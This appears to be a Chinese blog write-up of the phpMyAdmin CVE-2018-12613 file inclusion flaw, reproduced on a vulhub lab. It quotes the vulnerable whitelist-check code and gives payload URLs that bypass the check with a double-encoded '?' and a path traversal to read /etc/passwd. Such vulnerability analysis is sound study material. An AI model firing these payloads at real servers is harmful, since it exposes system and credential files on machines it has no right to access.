zoukankan      html  css  js  c++  java
  • phpMyadmin(CVE-2018-12613)后台任意文件包含漏洞分析

    前言

      影响版本:4.8.0——4.8.1

      本次复现使用4.8.1     点击下载

      复现平台为vulhub。此漏洞复现平台如何安装使用不在赘述。请自行百度。

    漏洞复现

      

      漏洞环境启动成功。

      访问该漏洞地址:

        

      使用payload:

    http://your-ip:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

      

      包含成功

    漏洞分析

      漏洞产生点位于:index.php文件54—67行

      

      可以看到如果要包含文件成功,必需条件有5个:1、不为空  2、字符串  3、不以index开头  4、不在$target_blacklist这个黑名单中  5、Core::checkPageValidity()函数为TRUE

      首先查看$target_blacklist变量的值:

      然后进入条件5所述函数中。此函数位于:librariesclassesCore.php文件443—476行:

      

        public static function checkPageValidity(&$page, array $whitelist = [])
        {
            if (empty($whitelist)) {
                $whitelist = self::$goto_whitelist;
            }
            if (! isset($page) || !is_string($page)) {
                return false;
            }
    
            if (in_array($page, $whitelist)) {
                return true;
            }
    
            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
    
            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
    
            return false;
        }
    

      可以看到在第一次$_page出现时即可绕过。其含义为截取$page  第一个'?'之前的部分,如果在白名单中,即返回TRUE。接下来查看白名单的值:

      

    public static $goto_whitelist = array(
            'db_datadict.php',
            'db_sql.php',
            'db_events.php',
            'db_export.php',
            'db_importdocsql.php',
            'db_multi_table_query.php',
            'db_structure.php',
            'db_import.php',
            'db_operations.php',
            'db_search.php',
            'db_routines.php',
            'export.php',
            'import.php',
            'index.php',
            'pdf_pages.php',
            'pdf_schema.php',
            'server_binlog.php',
            'server_collations.php',
            'server_databases.php',
            'server_engines.php',
            'server_export.php',
            'server_import.php',
            'server_privileges.php',
            'server_sql.php',
            'server_status.php',
            'server_status_advisor.php',
            'server_status_monitor.php',
            'server_status_queries.php',
            'server_status_variables.php',
            'server_variables.php',
            'sql.php',
            'tbl_addfield.php',
            'tbl_change.php',
            'tbl_create.php',
            'tbl_import.php',
            'tbl_indexes.php',
            'tbl_sql.php',
            'tbl_export.php',
            'tbl_operations.php',
            'tbl_structure.php',
            'tbl_relation.php',
            'tbl_replace.php',
            'tbl_row_action.php',
            'tbl_select.php',
            'tbl_zoom_select.php',
            'transformation_overview.php',
            'transformation_wrapper.php',
            'user_password.php',
        );
    

      随便选中其中之一即可。此处选中 "tbl_sql.php" 。构造payload:/index.php?target=tbl_sql.php%3f/../../../../../../../../etc/passwd

      

      

      此段代码表示将 "?"经过二次编码也可。

      

  • 相关阅读:
    部分源码:Visual Studio 2019 C运行时库(CRT)部分源码
    反思:中国歌手和欧美歌手的比较
    lol:lol 10分钟前上路到线小兵107只
    OS:RPM包的通用命名规则(转载)
    OS: kali linux的安装和配置
    OS_linux:Systemd 文档
    visual studio 2019 插件安装(插件扩展名vsix)
    解决git合并冲突问题
    nodejs封装的MongoDB的增删改查方法
    vue项目中购物车的全选功能的实现
  • 原文地址:https://www.cnblogs.com/Spec/p/11076331.html
Copyright © 2011-2022 走看看